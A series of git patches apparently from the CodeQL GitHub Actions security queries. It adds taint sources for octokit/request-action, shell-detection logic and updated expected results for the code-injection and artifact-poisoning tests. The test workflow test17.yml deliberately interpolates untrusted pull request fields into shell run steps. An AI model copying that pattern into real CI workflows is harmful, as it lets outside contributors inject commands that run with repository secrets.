Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -41,6 +42,8 @@ nodes | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -57,3 +60,4 @@ subpaths | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 2ed89bcb4bc..e6108dddd2a 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -13,6 +13,7 @@ edges | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -41,5 +42,7 @@ nodes | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 6d56b99407e..d05c7bebc07 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -3,6 +3,7 @@ | .github/workflows/artifactpoisoning21.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning71.yml:10:15:10:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning101.yml:11:15:11:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:94:15:94:39 | codecov/codecov-action@v3 | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:111:15:111:48 | peter-evans/create-pull-request@v5 | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:127:15:127:56 | thollander/actions-comment-pull-request@v2 | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 6a629764adc..2a401dee18a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -53,6 +53,7 @@ edges | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:16:9:19:59 | Run Step: pr_number | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 09f1fd1a81814dd55d84f15134f302a82c6cbc34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 11:48:19 +0200 Subject: [PATCH 0590/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 82891e5c017..12cf4c6106a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.67 +version: 0.1.68 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fb4416ffb1d..b10da74b711 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.67 +version: 0.1.68 groups: [actions, queries] suites: codeql-suites extractor: javascript From b072cfa1f7ee9959ad3423926850fadf44d98a66 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 10:40:33 +0200 Subject: [PATCH 0591/1267] Add pwsh as the default shell for windows runners --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 ++++++-- .../library-tests/.github/workflows/shell.yml | 23 +++++++++++++++++++ 2 files changed, 31 insertions(+), 2 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/shell.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7c433a39e62..67ef99e0fc8 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1438,12 +1438,18 @@ class RunImpl extends StepImpl { /** Gets the shell for this `run` mapping. */ string getShell() { - if exists(n.lookup("shell").(YamlString).getValue()) + if exists(n.lookup("shell")) then result = n.lookup("shell").(YamlString).getValue() else if exists(this.getInScopeDefaultValue("run", "shell")) then result = this.getInScopeDefaultValue("run", "shell").getValue() - else result = "bash" + else + if this.getEnclosingJob().getARunsOnLabel().matches(["ubuntu%", "macos%"]) + then result = "bash" + else + if this.getEnclosingJob().getARunsOnLabel().matches("windows%") + then result = "pwsh" + else result = "bash" } ShellScriptImpl getScript() { result = scriptScalar } diff --git a/ql/test/library-tests/.github/workflows/shell.yml b/ql/test/library-tests/.github/workflows/shell.yml new file mode 100644 index 00000000000..9392b81c6ab --- /dev/null +++ b/ql/test/library-tests/.github/workflows/shell.yml @@ -0,0 +1,23 @@ +on: push + +jobs: + job1: + runs-on: ubuntu-latest + steps: + - shell: pwsh + run: Write-Output "foo" + job2: + runs-on: ubuntu-latest + steps: + - run: echo "foo" + + job3: + runs-on: windows-latest + steps: + - shell: bash + run: echo "foo" + job4: + runs-on: windows-latest + steps: + - run: Write-Output "foo" + From 6bf3eb79a9aa809bc38ead6ccf3687aaab4bdae3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 10:44:43 +0200 Subject: [PATCH 0592/1267] Add sh as a bash-compatible POSIX shell --- ql/lib/codeql/actions/Bash.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 672f7727f5b..c1e038069eb 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -4,7 +4,7 @@ class BashShellScript extends ShellScript { BashShellScript() { exists(Run run | this = run.getScript() and - run.getShell().matches("bash%") + run.getShell().matches(["bash%", "sh"]) ) } From a1047d155c1d23668072a301aecad629574e3d74 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 14:48:53 +0200 Subject: [PATCH 0593/1267] Add new control checks using octokit/request-action --- ql/lib/codeql/actions/security/ControlChecks.qll | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 3b15fc78d10..760efaf5e7e 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -256,6 +256,9 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { or this.getCallee() = "actions/github-script" and this.getArgument("script").splitAt("\n").matches("%getMembershipForUserInOrg%") + or + this.getCallee() = "octokit/request-action" and + this.getArgument("route").regexpMatch("GET.*(memberships).*") } } @@ -279,6 +282,9 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { or this.getCallee() = "actions/github-script" and this.getArgument("script").splitAt("\n").matches("%getCollaboratorPermissionLevel%") + or + this.getCallee() = "octokit/request-action" and + this.getArgument("route").regexpMatch("GET.*(collaborators|permission).*") } } From 8323819504571d2fbfa1c83680009268f6dccafa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 15:51:00 +0200 Subject: [PATCH 0594/1267] New sources for octokit/request-action --- .../codeql/actions/dataflow/FlowSources.qll | 21 ++++++ ql/lib/codeql/actions/dataflow/TaintSteps.qll | 36 ++++++++- .../CWE-094/.github/workflows/test17.yml | 74 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 16 ++++ .../CWE-094/CodeInjectionMedium.expected | 12 +++ 5 files changed, 158 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index a9967a72ee6..b79a86ce27a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -295,3 +295,24 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { override string getSourceType() { result = "text" } } + +class OctokitRequestActionSource extends RemoteFlowSource { + OctokitRequestActionSource() { + exists(UsesStep u, string route | + u.getCallee() = "octokit/request-action" and + route = u.getArgument("route").trim() and + route.indexOf("GET") = 0 and + ( + route.matches("%/commits%") or + route.matches("%/comments%") or + route.matches("%/pulls%") or + route.matches("%/issues%") or + route.matches("%/users%") or + route.matches("%github.event.issue.pull_request.url%") + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } +} diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll index e9d5a44c929..80858df909b 100644 --- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -91,11 +91,45 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node ) } +/** + * A read of user-controlled field of the octokit/request-action action. + */ +predicate octokitRequestActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof OctokitRequestActionSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + succ.asExpr() = o and + ( + not o instanceof JsonReferenceExpression and + o.getFieldName() = "data" + or + o instanceof JsonReferenceExpression and + o.(JsonReferenceExpression).getInnerExpression().matches("%.data") and + o.(JsonReferenceExpression) + .getAccessPath() + .matches([ + "%.title", + "%.user.login", + "%.body", + "%.head.ref", + "%.head.repo.full_name", + "%.commit.author.email", + "%.commit.commiter.email", + "%.commit.message", + "%.email", + "%.name", + ]) + ) + ) +} + class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { dornyPathsFilterTaintStep(node1, node2) or tjActionsChangedFilesTaintStep(node1, node2) or tjActionsVerifyChangedFilesTaintStep(node1, node2) or - xt0rtedSlashCommandActionTaintStep(node1, node2) + xt0rtedSlashCommandActionTaintStep(node1, node2) or + octokitRequestActionTaintStep(node1, node2) } } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml new file mode 100644 index 00000000000..559c69c4710 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml @@ -0,0 +1,74 @@ +name: Test + +on: + issue_comment: + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + runs-on: ubuntu-latest + steps: + - name: Get PR details + id: get-pr + if: github.event_name == 'issue_comment' + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Set PR source branch as env variable + if: github.event_name == 'issue_comment' + run: | + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') + echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV + setup2: + runs-on: ubuntu-latest + steps: + - name: Get PR details + uses: octokit/request-action@v2.x + id: get-pr-details + with: + route: GET /repos/{repository}/pulls/{pull_number} + repository: ${{ github.repository }} + pull_number: ${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} + - name: Set environment variables + run: | + MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} + if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." >> $GITHUB_ENV; fi + echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV + echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV + setup3: + runs-on: ubuntu-latest + steps: + - id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} + - run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + setup4: + runs-on: ubuntu-latest + steps: + - id: get-pull-request + uses: octokit/request-action@v2.x + with: + route: GET /repos/{owner}/{repo}/pulls/{pull_number} + owner: foo + repo: bar + pull_number: ${{ github.event.issue.number }} + + - run: >- + echo "Pull request title is \"${{ + fromJson(steps.get-pull-request.outputs.data).title }}\" but expected + \"Updated test pull request\"" && exit 1 + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 699d53da9cc..1ad0d498791 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -155,6 +155,10 @@ edges | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -472,6 +476,14 @@ nodes | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -623,6 +635,10 @@ subpaths | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 6d33d3cc569..eb852fdd4d2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -155,6 +155,10 @@ edges | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | 